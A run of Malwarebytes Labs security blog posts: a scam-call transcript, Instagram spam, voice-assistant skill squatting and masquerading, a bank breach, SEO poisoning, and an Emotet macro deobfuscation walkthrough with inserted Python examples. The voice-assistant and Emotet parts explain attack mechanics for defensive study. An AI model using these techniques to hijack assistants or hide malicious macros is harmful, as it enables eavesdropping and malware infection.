AG: That geek company is closed. That business doesn’t exist anymore, and no business associated with that article that is, uh, open. Like we have closed that business. My…self called BBB because my friend works there. It could be that he called because I interested him to. And that probably…

MWB: Okay. Who am I speaking with? Is this Kevin Nash?

AG: Yeah, that’s right. My client owns this company, and uh…that company doesn’t exist anymore. So, uh…his personal information is there on that post. And uh, he got critically attacked by someone as well, due to the, you know, the information there on the post. People got to know about him, knows his business, everything related to that business, now he is, uh, concerned regarding his privacy, you know?

MWB: And What is your client’s name?

AG: Kunal Bansal.

MWB: Okay, um, I’m a little confused. If the company is closed, then what—were you planning on reopening the company? Is that why you want to get rid of the post?

AG: No. The problems of getting that post removed is that his personal details are mentioned on that post. Even the photo is there on the post.

MWB: Okay, I’ll tell you what. If you can send me, send me all the information in the email, and what it is you want us to do, I’ll see what I can do for you. Do you have a phone that doesn’t go to voicemail? You’re a lawyer? And in what state are you practicing?

AG: I’m in California. Marina Del Ray?

MWB: Can you send me the information of your law firm? And um, all the information of the client, and I’ll get back to you as soon as I get that information.

AG: Thank you so much.

MWB: Thank you.

Call two

AG: [Inaudible] This is Kevin Nash.

MWB: Hey yeah, I can hear you. You’re the lawyer for Mr. Bansal?

AG: Kunal Bansal. Yeah, that’s right.

MWB: Okay, what’s the name of your law firm again?

AG: USA Legal Services


AG: It’s USA Legal Services

MWB: Okay and you’re out of, uh, California?

AG: Yep.

MWB: Do you have an address there in California?

AG: That would be [REDACTED]

MWB: Do you have an office number?

AG: Yes, I have office number, and this is my office number.

MWB: Your office number is the 323?

AG: Yeah, that’s my personal, direct line in office.

MWB: Has [Kunal Bansal] made any restitution? On the people that he scammed?

[America Geeks hangs up.]

Call three

AG: Yeah, I’m so sorry, I don’t, the line got blank.

MWB: Well, that’s okay. Okay, so was there any restitution made on behalf of your client?

AG: Well, uh, I’ll need to check once with the department there, and I’ll get back to you, certainly. And I’ll have something emailed to you, within minutes. Alright? [NOTE: Mr. Nash never provided any evidence of restitution, or any explanation of who he was checking with if the company was shut down.]

MWB: Okay. Uh, one other question. Okay, so the address you gave me, [REDACTED]. I can’t find a USA Legal Services at that address. Is that the correct address?

AG: That should be [REDACTED SECOND ADDRESS]

MWB: Oh now it’s [REDACTED]?

AG: Talking to me like I’m some criminal or something…

MWB: Listen—I deal with complaints and I’m trying to clarify who you are. I mean, I get a phone call. First of all, the phone call stated that you are Kevin Nash from Better Business Bureau. Now when I call you back you’re Kevin Nash. . .and you’re the lawyer, and then you’re giving me the address for a law firm that doesn’t exist.

AG: [Silence.]

MWB: So yes, I have some reservations that I’m not dealing with a legitimate person. Your emails are coming from a different person altogether. They’re not coming from a law office. They’re coming from “Naresh Kumar.”

AG: I got you, I got you. I have a, let me, let me send you an email.

MWB: Can you explain to me why that I’m getting emails from Naresh Kumar, and you’re saying you’re Kevin Nash?  And you’re a lawyer?

AG: [pause] That’s right. He’s the person who’s dealing with me through Mr. Kunal Bansal. And the reason why you’re not getting any email from my address is because I was having him do that. Now I do have access to my email and if you’ll give me like two minutes, then…restitution is what you’re asking for? I’ll send it to you through my official email wherein I will have my company phone number, as well as my number, as well as company [inaudible]

MWB: What’s your company phone number?

AG: That will be 844-676-LOAN. L-O-A-N. [NOTE: Searches on this number returned hits for mortgage loans and student debt consolidation. We did not redact the number because we believe it to be associated with multiple fraudulent businesses. All websites with this number are now down.]


AG: There’s an alternate too, it’s [REDACTED.]  Law.

MWB: Okay, well, if you can send me the information, Mr. Nash?

AG: I’ll send it to you from a [inaudible] email address this time, alright?

MWB: Okay. Alright, I’ll be waiting for your email address.

Digging into America Geeks ops

After speaking with Mr. Nash, we decided to take a look at how extensive America Geeks operations really were. First and foremost, he provided an Indian cell phone number that popped in Google Cache as a corporate contact on the site https://shopping4kart[.]com.

Passive DNS for that site revealed an extensive set of related domains that appear to be used for tech support scams.

A survey of historical victim reports using overlapping phone numbers revealed the following business names:

  • America Geeks
  • Geeks Technical Support
  • Mark Software Private Limited, USA
  • Technology LLC
  • Blue Alpha
  • IT Pvt Ltd
  • USA Legal Services LLC

Independent researchers provided us with the following list of phone numbers used by the threat actor group:

  • 18776589988
  • 18776941838
  • 18882466988
  • 18883502808
  • 18884273330
  • 18884898307
  • 18885882055
  • 18886100490
  • 18886608571
  • 18887590763
  • 18887789143
  • 18887799348
  • 18889127011
  • 18889597430
  • 18558870097
  • 18446709167
  • 18445714235
  • 18887549063
  • 18887789193
  • 18552174635
  • 18882955166
  • 18882954668

[NOTE: Numbers are provided for historical purposes only. Scammers change numbers frequently.]

The America Geeks website was in fact down at the time of Mr. Nash’s phone call. But scammers frequently maintain extensive domain holdings so they can shift operations when one domain receives too much attention. America Geeks makes frequent use of browser lock screens, but also has a fair number of fake corporate sites to attract organic traffic. The domains used over their lifespan include, but are not limited to:


[NOTE: A number of these domains are historical, and may be down or transferred to a legitimate owner since publication.]

Concluding a review of their historical infrastructure, we found tech support scam complaints relating to Kunal Bansal–related properties dating back to 2012. Although America Geeks’ website is down at the time of writing, we find it unlikely that their scamming has ceased entirely. Instead, it has most likely shifted to a new company name. Given that they had resources sufficient to target users in multiple countries, in their own language, America Geeks appears to have been extremely profitable, and we advise users to be wary of any new company name used by the America Geeks proprietors.

For more on tech support scams and how to stay safe, see the following blog, or check out our forums to report new scam sites and numbers.

The post A conversation with America Geeks appeared first on Malwarebytes Labs.


Instagram story spam claims free Apple Watch

Thu, 05/31/2018 - 15:00

I have to admit, I’m not 100 percent sure who Elton Castee is. “Who’s that?” you ask? Digging around revealed that he’s big on YouTube, has done some films, and raises money for dogs, which is very cool. He’s also popular on Instagram, with 400k+ followers. With that in mind, we’ve seen a few reports of his account being compromised (and by “few”, I mean “absolutely loads”), and decided to check it out.


A phony phone giveaway

Visiting on the web while not logged in reveals the most recent post looks a little different from the other selfies:


A single block of white text on a black background, which reads as follows:

Wassup guys! I am giving away 100 free iPhone X’s and Apple watches on my IG Story! Claim them before it’s too late. Love you guys (emoji heart thing)

Visiting the Instagram app while logged in immediately takes you to an Instagram Story. If you’re not familiar with an Instagram story, it’s a rotating set of images/video that you swipe through one after the other.


Swiping up on any of the images redirects you to the below Apple Watch giveaway website, located at:



Please choose which Apple watch you would like to receive 

Once you’ve selected your preferred watch (in this case, some sort of neon yellow thing with a sport band), you’re asked to click “Confirm” and move to the next stage.


We’re now faced with a series of text boxes so the personal information data input games can begin.


Full name, email, street, city, zip code, and country are all requested on this page. Take note of the very specific wording:

Thank you for completing the offer. We now require your address in order for us to send you the item.

There’s nothing ambiguous there, right? Give address, receive item. And yet…


Wait, “locating?” I thought you already had my watch? Why are we trying to locate one? I already gave you all that juicy personal information! What happens if there’s no stock?


Oh, phew, it’s available. But…now I have to confirm I’m a human and not a bot, so they can “prevent spam,” because apparently bots have a thing for filling in their personal information and having neon sports watches delivered to their home addresses. If I know my Internet antics, this is surely going to end with a pile of surveys to choose from:


Hooray, a pile of surveys to choose from!

In practical terms, what this means is you’ve already handed over a bunch of personal information to goodness knows who, and now you’re being asked to do the exact same thing for a third-party entity of your choice. Quizzical eyebrows were raised at the text, which states:

This page will unlock and ask for your shipping address

Because I’m almost certain we already did that a few pages back.

I suppose you could pick the iPhone X competition and complement the watch, which is surely going to arrive at some point, but from experience, we’d advise you to steer well clear of too-good-to-be-true freebie offers such as these.

Instagram lockdown

There are, of course, things you can do to help keep your Instagram account safe from harm. It’s possible there are additional security measures in place for a verified account, and we don’t know what’s happened in this case to allow spam to be posted, but some general tips for protecting your Instagram are always a good thing.

A strong, unique password, a password manager (if that’s your thing), a locked down email account tied to your Instagram, logging out if at a public terminal (or your own device, if you want to be super sure), and enabling two factor authentication are all great things to set in motion.

Any social media account doing big numbers is always a prime draw for scammers—from Myspace to Facebook and Tumblr to Twitter, swiping just one big name can result in spam, clicks, and even possibly malware galore for the fanbase. Hopefully Elton will regain access to his account shortly, but for now, try to avoid winding up in a similar situation to Elton, Alicia Keys, or anyone else struck down by a bout of spammy antics. Your followers will thank you for it.

The post Instagram story spam claims free Apple Watch appeared first on Malwarebytes Labs.


Researchers discover vulnerabilities in smart assistants’ voice commands

Wed, 05/30/2018 - 16:59

Virtual personal assistants (VPAs), also known as smart assistants, like Amazon’s Alexa and Google’s Assistant, are in the spotlight for their vulnerability to attack. Take, for example, the incident in which an Oregon couple’s Echo smart speaker inadvertently recorded their conversation and sent it to a random contact. Or the time Alexa started laughing out of the blue. Indeed, something has to be done about these incidents, whether they are accidental or not.

Earlier this month, researchers from Indiana University, the Chinese Academy of Sciences, and the University of Virginia found exploitable weaknesses in the VPAs above. Researchers dubbed the techniques they used to reveal these weaknesses as voice squatting and voice masquerading. Both take advantage of the way smart assistants process voice commands. Unsurprisingly, these also exploit users’ misconceptions about how such devices work.

How smart assistants work

VPA services used in smart speakers can do what they’re created to do with the use of apps called “skills” (by Amazon) or “actions” (by Google). A skill or an action gives a VPA additional features. Users interact with a smart assistant through a voice user interface (VUI), which lets them run a skill or action by speaking.

Entrepreneurs, with the help of developers, are already creating their own voice assistant (VA) apps to cater to client needs, make their services accessible on the voice platform, or simply offer users an enjoyable experience.

As of this writing, the smart assistant apps market is booming. Alexa alone already has tens of thousands of skills, thanks to the Alexa Skills Kit. Furthermore, Amazon has recently released Alexa Skill Blueprints, making skill creation easy for people with little to no knowledge of coding.

Unfortunately, the availability of such a kit to the public has made abuse by potential threat actors possible, making the VPA realm an entirely new attack vector. If an attack is successful—and the study researchers conducted proved that it can be—a significant number of users could be affected. They concluded that remote, large-scale attacks are “indeed realistic.”

Squatters and masqueraders

Voice squatting is a method wherein a threat actor abuses the way a skill or action is invoked. Let’s take an example from the researchers’ white paper. If a user says, “Alexa, open Capital One” to run the Capital One skill, a threat actor can potentially create a malicious app with a similarly pronounced name, such as Capital Won. The command meant for the Capital One skill is then hijacked to run the malicious Capital Won skill instead. Also, as Amazon is now rewarding kids for saying “please” when commanding Alexa, a similar hijacking can occur if a threat actor registers a paraphrased name like Capital One please or Capital One Police.

“Please” and “police” may mean two totally different things to us, but for current smart assistants, these words are the same, as they cannot correctly recognize one invocation name over another similar-sounding one.

Suffice it to say, VPAs are not great at handling homophones.
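To make the hijack concrete, here is an added Python model of invocation-name routing (example code, not the researchers’ tooling and not Amazon’s or Google’s real matching logic, which is an assumption made for illustration). The router matches the transcribed words against registered invocation names and lets the longest exact match win, which is all a squatter needs: register the homophone the speech recogniser produces, or the official name plus a trailing “please”, and the user’s command lands on the wrong skill. A second function shows the check a skill store could run at registration time; its filler-word and homophone tables are constructed for the example.

```python
import re

# Simplified routing model (an assumption for this example): the wake word
# and a launch phrase are stripped, then the longest registered invocation
# name that exactly matches the start of the remaining words wins.
LAUNCH_PHRASES = ("open", "launch", "start", "ask", "talk to", "tell")
# Constructed tables: words a squatter can append, and words the speech
# recogniser is likely to confuse with one another.
FILLER_WORDS = {"please", "police", "app", "skill", "now", "the"}
HOMOPHONES = {"won": "one", "1": "one", "too": "two", "to": "two", "2": "two",
              "four": "for", "4": "for", "ate": "eight", "8": "eight"}


def _words(text: str) -> list:
    return re.sub(r"[^a-z0-9 ]", " ", text.lower()).split()


def resolve(utterance: str, registry: dict):
    """Route a transcribed utterance to a skill id from registry, or None."""
    words = _words(utterance)
    if words and words[0] == "alexa":
        words = words[1:]
    for phrase in LAUNCH_PHRASES:
        parts = phrase.split()
        if words[:len(parts)] == parts:
            words = words[len(parts):]
            break
    best_name, best_skill = [], None
    for invocation, skill in registry.items():
        inv = _words(invocation)
        # Longest exact prefix match wins, so "capital one please" beats "capital one".
        if inv and words[:len(inv)] == inv and len(inv) > len(best_name):
            best_name, best_skill = inv, skill
    return best_skill


def canonical(invocation: str) -> tuple:
    """Collapse filler words and homophones so near-identical names compare equal."""
    return tuple(HOMOPHONES.get(w, w) for w in _words(invocation) if w not in FILLER_WORDS)


def check_registration(new_name: str, registry: dict) -> list:
    """Existing invocation names that a new name would squat on."""
    new_c = canonical(new_name)
    conflicts = []
    for invocation in registry:
        c = canonical(invocation)
        if not new_c or not c:
            continue
        # Equal after normalisation, or one is a prefix extension of the other.
        if new_c == c or new_c[:len(c)] == c or c[:len(new_c)] == new_c:
            conflicts.append(invocation)
    return conflicts


if __name__ == "__main__":
    official = {"capital one": "capitalone-official", "weather": "weather-official"}
    squatted = {**official, "capital won": "squatter-homophone",
                "capital one please": "squatter-suffix"}
    for spoken in ("Alexa, open Capital One", "Alexa, open Capital One please",
                   "Alexa, ask Capital Won for my balance"):
        print(f"{spoken!r:45} -> {resolve(spoken, squatted)}")
    for candidate in ("Capital Won", "Capital One Police", "Bike Race"):
        print(f"register {candidate!r:22} conflicts: {check_registration(candidate, official)}")
```

The registration check is the interesting half: it is cheap, it runs before any user is exposed, and it catches both variants the paper describes. Its weakness is the homophone table, which has to be maintained by hand (or replaced with the recogniser’s own confusion data) to keep up with whatever the speech engine actually mishears.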

Read: Out of character: Homograph attacks explained

Voice masquerading, on the other hand, is a method wherein a malicious skill impersonates a legitimate one to either trick users into giving out their personal information and account credentials or eavesdrop on conversations without user awareness.

Researchers identified two ways this attack can be made: in-communication skill switch and faking termination. The former takes advantage of the false assumption that smart assistants readily switch from one skill to another once users invoke a new one. Going back to our previous example, if Capital Won is already running and the user decides to ask “Alexa, what’ll the weather be like today?”, Capital Won then pretends to hand over control to the Weather skill in response to the invocation when, in fact, it is still Capital Won running but this time impersonating the Weather skill.

As for the latter, faking termination abuses voluntary skill termination, a feature wherein skills can self-terminate after delivering a voice response such as “Goodbye!” to users. A malicious skill can be programmed to say “Goodbye!” but remain running and listening in the background for a given length of time.

But…I like my smart assistant!

No need to box up your smart speakers and send them back if these vulnerabilities worry you. But it is essential for users to really get to know how their voice assistant works. We believe that doing so can make a significant difference in maintaining one’s privacy and protecting from attack.

“Making devices, such as Alexa, responsible for important systems and controls around the house is concerning, especially when evidence emerges that it’s able to turn a simple mistake into a potentially serious consequence,” our very own Malware Intelligence Analyst Chris Boyd said in an interview with Forbes.

Smart assistants and IoT, in general, are still fairly new tech, so we expect improvements in the AI, and the security and privacy efforts within this sector. Both Amazon and Google have claimed they already have protections against voice squatting and voice masquerading.

While it is true that the researchers had already met with both firms to help them understand these threats further and offer them mitigating steps, they remain skeptical about whether the protections put in place are indeed adequate. Only time will tell.

The post Researchers discover vulnerabilities in smart assistants’ voice commands appeared first on Malwarebytes Labs.


Two major Canadian banks blackmailed after alleged data breach

Tue, 05/29/2018 - 19:52

While the US was celebrating Memorial Day on Monday, Canada was dealing with an unusual data breach affecting two popular financial institutions: Simplii Financial and Bank of Montreal (BMO).

The CBC broke the story and updated it throughout the day to mention that some 90,000 customers were possibly affected by this attack, which the banks say they became aware of on Sunday, just one day prior.

While at first the details were scarce, the CBC later confirmed that the perpetrators had threatened to release their data trove publicly unless the banks agreed to pay them a $1 million ransom by just before midnight on May 28.

BMO has said that they did not pay the ransom and instead is focusing on helping and protecting its customers. Both banks are offering support and in particular credit monitoring services to the victims of this incident.

This hack is noteworthy for targeting two major Canadian financial institutions at the same time and exposing extremely sensitive personal information which, unlike a password, cannot be changed. Although the data has now lost some of its immediate value, the attackers may decide to dump all the information publicly or sell it to the highest bidder.

Breaches leave users scared and frustrated because people know their data may end up being stolen in a way that is out of their own control. Having said that, certain measures can contain the damage and can be readily applied. For one, using strong and unique passwords is absolutely critical so that hackers cannot easily compromise your other accounts.

Many online services have security questions as part of the authentication process that are problematic in themselves. Rather than answering ‘blue’ to the question about your favourite colour, be a little more creative and come up with a full sentence, or even something that has nothing to do with colours at all. Finally, whenever possible, you should enable two-factor authentication as it provides an additional layer of security to the otherwise weak password-only approach.

The post Two major Canadian banks blackmailed after alleged data breach appeared first on Malwarebytes Labs.


SEO poisoning: Is it worth it?

Tue, 05/29/2018 - 19:12

Search Engine Optimization (SEO) poisoning basically comes down to getting your web page high in the rankings for relevant search results without buying advertisements or using legitimate, but tedious, SEO best practices. Instead, threat actors use illegal means to push their page to the top. Sometimes, this technique is also referred to as black hat SEO. (Although the people selling these services will refer to them as “link building services.”)

So how does SEO poisoning work? And is it something site owners should actually try? Or should they avoid it at all costs?

The basics

SEO is short for Search Engine Optimization and it is a marketing strategy that is designed to make sure that your website is found if people search for certain keywords that are relevant to your business. The ranking of a site in Google’s search results is primarily based on how well the page is optimized, but it’s also based on “reputation.” The reputation of a page is calculated using the number of inbound links pointing to that page. It helps a lot if the incoming links come from pages that are about the same or related subjects, but a large amount of links coming from all kinds of sites helps as well.

Why focus on Google?

In this article, we will focus on how SEO works for Google. This is for a few reasons:

  • Google is by far the most popular search engine, despite mighty efforts by their competitors. The fact that “Googling” is a verb in many languages should tell you enough.
  • Google is relatively open about how its algorithms work, and you can find a lot of information if you want to improve the ranking of your search results, which is what SEO is all about. For good results, it’s imperative that web developers keep an eye on new updates and how these updates might influence their SEO strategy.
  • Google is the industry standard in this field, and because of this many available SEO tools are limited to or aiming for Google results.
How does link building work?

Search engines want to serve you authoritative pages on the subject that you are looking for. One of the determining factors for the ranking in the search results is called the Page Authority. As you can see in the example below, the page authority is not just a matter of how many incoming links there are. And it is also not the only factor that determines your ranking in the search results. Even though the BBC site has more “page authority” on the keyword of “spyware,” the Page Authority calculation is based on many other factors and seems to take into account that detecting spyware is part of Malwarebytes’ core business.

Authority calculations and screenshot made with Moz Pro

So, a good method to be seen by the search engine’s algorithm as an authority in a certain field is to attract incoming links. And it is important that these links come from other authoritative sites in the field that your page aims to rank high for. Quality really outweighs quantity here. To accomplish this, you need a well-written and cleverly formatted (optimized) page that people will point to if they want someone to read an informative or explanatory piece.

When does link building become SEO poisoning?

If you are lazy, can’t spend the money to hire someone, or it’s just plain hopeless to become an authority due to heavy competition in your field or for your keywords, you might consider buying incoming links from a black market vendor. These threat actors will usually have, or be able to obtain, a multitude of compromised sites on which they can post links. Another method they may use is to spam forums with the help of spambots. So, we draw the line at whether the site owner agrees to the links being posted on their site.

Contrary to popular belief, posting links on social media like Facebook and Twitter does not help to improve a page’s SEO. The links on social media are “nofollow” links, and Google’s bots will not follow them or add them to your tally of incoming links. Google+ is an exception to this rule. I wonder why.

A quality link from an authoritative site weighs heavier than a lot of low quality links.

Pure malicious purpose

A recent example where SEO poisoning was used successfully is one where link building was done purely for malicious purposes—to infect visitors. By adding keywords and links in hacked websites, threat actors were able to get malicious pages ranked at the top of the Google search results for specific and carefully-chosen queries. The desired queries were banking and financial questions, and visitors of the ranked pages were infected with a banking Trojan.
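The sites that black hat vendors inject links into are usually someone else’s, and the injected links are hidden from human visitors so the owner does not notice. As an added example (not from the post), here is a Python check a site owner can run over their own pages to find outbound links that are rendered but invisible: inside elements styled `display:none`, pushed off-screen, set to zero font size, or carrying empty anchor text. The hiding heuristics are my own assumptions, not an exhaustive list, and the sample page is constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristics for "rendered but invisible" content. These are assumptions
# for this example, not an exhaustive list of hiding tricks.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0(?![.\d])|"
    r"opacity\s*:\s*0(?![.\d])|(?:left|top|text-indent)\s*:\s*-\d{3,}px",
    re.I,
)
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "source", "track", "wbr"}


class HiddenLinkFinder(HTMLParser):
    """Collect outbound <a href> links that a visitor would never see."""

    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host.lower()
        self.stack = []          # (tag, reason it is hidden, or None)
        self.current_link = None
        self.findings = []

    @staticmethod
    def _hidden_reason(attrs: dict):
        if "hidden" in attrs:
            return "hidden attribute"
        match = HIDDEN_STYLE.search(attrs.get("style") or "")
        return f"style: {match.group(0)}" if match else None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        # Hidden-ness is inherited: anything inside a hidden element is hidden.
        inherited = self.stack[-1][1] if self.stack else None
        reason = inherited or self._hidden_reason(attrs)
        if tag == "a" and self.current_link is None:
            href = attrs.get("href") or ""
            self.current_link = {
                "href": href,
                "host": (urlparse(href).hostname or "").lower(),
                "text": "",
                "reason": reason,
            }
        if tag not in VOID_TAGS:
            self.stack.append((tag, reason))

    def handle_data(self, data):
        if self.current_link is not None:
            self.current_link["text"] += data

    def handle_endtag(self, tag):
        if tag == "a" and self.current_link is not None:
            link, self.current_link = self.current_link, None
            link["text"] = link["text"].strip()
            if link["reason"] is None and not link["text"]:
                link["reason"] = "empty anchor text"
            external = link["host"] and link["host"] != self.page_host
            if link["reason"] and external:
                self.findings.append(link)
        # Pop back to the matching open tag; tolerate sloppy markup.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break


def find_hidden_links(html: str, page_host: str) -> list:
    """Return hidden outbound links found in one page's HTML."""
    parser = HiddenLinkFinder(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: one legitimate nav link, a block pushed off-screen
# holding two spam links, a zero-font-size link, and a visible nofollow link.
SAMPLE_PAGE = """<html><body>
<nav><a href="https://example.org/about">About us</a></nav>
<p>Legitimate article text here.</p>
<div style="position:absolute; left:-9999px;">
  <a href="http://cheap-pills.invalid/buy">buy pills online</a>
  <a href="http://casino-bonus.invalid/">online casino</a>
</div>
<a href="http://payday.invalid/loans" style="font-size:0">payday loans</a>
<a href="https://example.org/contact"></a>
<footer><a href="http://partner.invalid/" rel="nofollow">Partner</a></footer>
</body></html>"""

if __name__ == "__main__":
    for hit in find_hidden_links(SAMPLE_PAGE, "example.org"):
        print(f"{hit['host']:24} {hit['reason']:28} {hit['href']}")
```

Run it over the HTML your server actually emits rather than your source templates: link injection usually lands in a compromised theme file, a database-stored post body or a plugin, so the output differs from what sits in version control. Hits pointing at pharmacy, gambling or loan domains you never linked to are the tell that your site is part of someone’s link-building inventory.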

Are all link building services bad?

No, that’s not what we are saying. But the services offered on black hat forums with a “no money back guarantee” should be examined with a 10-foot pole and a disinfected microscope. If you are not an SEO professional and SEO is just a by-product of trying to sell your goods or services, then by all means, contact a professional and see what they can do for you.

Just make sure you don’t end up sponsoring some malware author who goes around hacking legitimate sites and who may end up ruining your reputation. Because there are ways to investigate whether you have used black hat SEO techniques to boost your search rankings.

Is SEO poisoning actually recommended?

It is not recommended for several reasons:

  • It’s not effective. With Google’s new search engine algorithms, black hat SEO is far less effective than it used to be, but is still offered by malware actors on underground markets.
  • There are negative side effects. If Google or others sniff out your method, this might ruin page or domain authority, as well as professional reputation.
  • It doesn’t come cheap. In the long run, you may end up spending a lot of money—money much better spent on legitimate and long-standing methods for success, such as hiring an SEO professional on staff or working with a consultant to learn best practices.

Not to give you any ideas, but you can also buy negative link building services for your competitors. As appealing as it may sound to have your competitors’ product associated with the keyword Viagra, we do not recommend using these either.

The best long-term solution is to work hard and play fair using legitimate SEO tactics to boost your page rankings. If you aim for a cheap and easy way around SEO, you’ll get exactly what you paid for: a whole lot of nothing.

The post SEO poisoning: Is it worth it? appeared first on Malwarebytes Labs.


A week in security (May 21 – May 27)

Mon, 05/28/2018 - 20:26

Last week we told you about a Mac cryptominer using XMRig, an overview of Dreamcast related scams, part 1 of decoding Emotet, and what to do about bad coding habits that die hard.

We also published the results of our second CrackMe contest.

Other news

News about the Russian “router botnet”

Stay safe, everyone!

The post A week in security (May 21 – May 27) appeared first on Malwarebytes Labs.


Malware analysis: decoding Emotet, part 1

Fri, 05/25/2018 - 15:00

Emotet Banking Trojan malware has been around for quite some time now. As such, infosec researchers have made several attempts to develop tools to de-obfuscate and even decrypt the AES-encrypted code belonging to this malware.

The problem with these tools is that they target active versions of the malware. They run into problems when the authors of the malware change the code. The change could be anything from slight variations to the code structure to drastic changes such as moving from a VBA project to PowerShell scripting. Usually, even a minor code variation breaks the tools.

The main goal of this article is to help readers understand the structure and flow of Emotet in detail, so that code variations do not pose challenges to analysts who are trying to decode it in the future. We will also take a deep dive into some important parts of the code itself in order to understand the execution in a detailed, step-by-step process.

In the first part of this two-part analysis, we look at the VBA code, where you’ll learn how to recognize and discard “dead” code thrown in to complicate the analysis process. We also look at techniques that can be used to extract the obfuscated commands, and how the code executes.

Emotet overview

For the purpose of our analysis, we’re taking a look at this sample:

File: PAYMENT 225EWF.doc

MD5: e8e468710c0a4f0906305c435a761902

SHA-256: 707fedfeadbfa4248cfc6711b5a0b98e1684cd37a6e0544e9b7bde4b86096963

The current version of the Emotet downloader uses PowerShell to execute final commands. The infection vector is a traditional email phishing campaign. The phish would contain a link that the victim is supposed to click on, which in turn would start the download of the malware. The malware is usually a Word document, which prompts the victim to enable macros. Once the macros are enabled, the VBA executes in the background, and the payload is downloaded and executed on the victim’s computer.

VBA code

Let’s take a quick look at how we can access the VBA code from the infected Microsoft Word document. In order to enable the Developer view in Word, go to File and select “Options.” In Options, click on “Customize Ribbon.” Enable the “Developer” option and hit OK.

This should now get you a “Developer” item in the top menu bar. Once you click on “Developer,” you’ll see the option “Visual Basic.”

Click on Visual Basic and you’ll be presented with the entire project in a separate window. We can now start analyzing the code.

Alternatively, we can extract the PowerShell script in an automated way by running the document in a VM and checking the parameters with which PowerShell was launched, e.g. with the help of Process Explorer. Sandboxes such as Hybrid Analysis also extract it automatically.

Code execution

Once the content (i.e., the macros) is enabled, execution starts.

The VBA code comes as part of the malicious MS Office document. As soon as the macros are enabled, the code executes in the background.

As an attempt at obfuscating the code, the developers have included a lot of text that is not used. Only part of the entire code is usable, and it is quite well hidden.

A faster way to get straight into the code is to start at the macro code that is called for execution of the initial commands. In the case of the sample analyzed here, it is the Sub AutoOpen(). We start by following this sub procedure.

We will now discard all the useless code that has been included in the sub to complicate analysis.

At the end of the sub procedure, we can see the method being called:

The method shown above calls on a sub and a function.

First, we take a look at sub ndUzTzJ.

This sub again has some useless text that is just there to add complexity for the purposes of analysis. We will focus on usable code only.

This is what the sub should look like after we’ve discarded the useless code:

vbHide will be assigned a value of 0, which means the window is hidden and focus is passed to the hidden window.

DsPBkKtzcIwF – generates the command.

ndUzTzJ – calls WScript.Shell to execute the command.

Let’s take a look at a section of the Function DsPBkKtzcIwF():

In the code snippet above, we can see a few notable things:

Variables are being used to store assigned values. The values will then be passed to a different function, yy222222222222222y(), for processing. Once processed, the values are then assigned to different variables again and these variables will be used to construct the encrypted code that will be passed onto the system for decryption using PowerShell.

Deep dive

Let’s take a deep dive here and closely analyze the code:

JMArl = “zahajUZomiAjVADEAMAA4ADMdpokrTZ”

Variable JMArl is assigned the value of “zahajUZomiAjVADEAMAA4ADMdpokrTZ”

szFqp = sRWNiPRldXLv = 21790 + 2115454 * PhcMjZjwl – CLng(8712932) / (zunFnTXk – Sqr(1328634 * Oct(7463260) – 1977628 – 4976151) * (294265 / XiFEWH))

vLkhkiRclJ = GcDcX = 3122978 + 1398811 * JTkURPW – CLng(9593915) / (krXPEiFIa – Sqr(1266549 * Oct(1775652) – 8314095 – 5625841) * (8872696 / mNsSkdPD))

This code is not usable—we will discard it.

sEVQo = IjKrpJC + yy222222222222222y(JMArl, 14, 11)

This is where most of the action takes place. The variable sEVQo is assigned the output of “IjKrpJC + yy222222222222222y(JMArl, 14, 11)”.

“IjKrpJC” doesn’t serve any purpose; we will discard it.

yy222222222222222y() is the function being called. Let’s take a look at the function itself:

Now, let’s get rid of all the garbage code from the function and then have another look at it:

The function calls on the Mid function, which processes the data for further use.

Mid function


Now that we understand how the code flow has been structured, let’s take a look at how the program executes.

Here’s the variable sEVQo before it has been assigned any value:

sEVQo now calls on yy222222222222222y(). We can see that the value “14” has been passed on to the function variable “twOYMDvfbGk”:

sEVQo = IjKrpJC + yy222222222222222y(JMArl, 14, 11)

Moving on, we can see the value “11” has been passed on to the function variable “VSTcawBYGW”:

sEVQo = IjKrpJC + yy222222222222222y(JMArl, 14, 11)

Finally, the text string will be passed on to the variable mbPRLWAjZ, which is EMPTY at first:

Now, this data will be processed using the Mid function, as described above.

Let’s take a look at how that unfolds:


twOYMDvfbGk = 14

VSTcawBYGW = 11

Mid(hPoMiTjfoDT, twOYMDvfbGk, VSTcawBYGW):

Mid("zahajUZomiAjVADEAMAA4ADMdpokrTZ", 14, 11)

It should translate to:


Now let’s take a look at the function in execution again:

And it will be passed back to the calling variable:

The variable sEVQo has now been assigned the value ADEAMAA4AD. That was a look at one of the many variables used in this function.

To see how it all flows into the end result for this value, we can take a look at the final assignment of the variable:

The value assigned to DsPBkKtzcIwF after the above line of code is executed is the command that will be executed by sub ndUzTzJ:

We can now print the output to screen (using MsgBox) to have a quick look or to the immediate window (using Debug.Print) for a complete result.

Here’s the part of the command from above that invokes PowerShell:

Which should translate (look at the highlighted text) to:

That was a look at how to get the final command with the encrypted data out of the VBA code. In part two of this series, we’ll decrypt this data to extract the stage two payload URLs from it.
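The reassembly step the walkthrough traces by hand, as an added example in Python (not code from the article or from the Emotet sample): vba_mid reproduces VBA’s 1-based Mid() semantics and is run on the page’s JMArl literal with the page’s arguments (14, 11); extract_chunks keeps only the two line shapes that carry data (a string literal and a yy222222222222222y(...) call) and treats everything else as the dead code the article discards; decode_encoded_command assumes the base64/UTF-16LE form PowerShell accepts for -EncodedCommand. The macro text, its padding, the variable names other than yy222222222222222y and IjKrpJC, and the final command are all constructed here.

```python
"""Emulate the Mid()-based string reassembly described in the Emotet part 1
walkthrough and decode the resulting PowerShell -EncodedCommand argument.

Added example for illustration; not code from the article or the sample.
The only values taken from the page are the JMArl literal and the
Mid(JMArl, 14, 11) call; every other string, name and command is constructed."""
import base64
import re

# From the walkthrough: the literal assigned to JMArl.
JMARL = "zahajUZomiAjVADEAMAA4ADMdpokrTZ"


def vba_mid(s, start, length=None):
    """VBA Mid(): 1-based start; a missing length, or one past the end, returns
    the rest of the string; a start beyond the end returns "" as VBA does."""
    if start < 1:
        raise ValueError("VBA Mid() requires start >= 1")
    if length is not None and length < 0:
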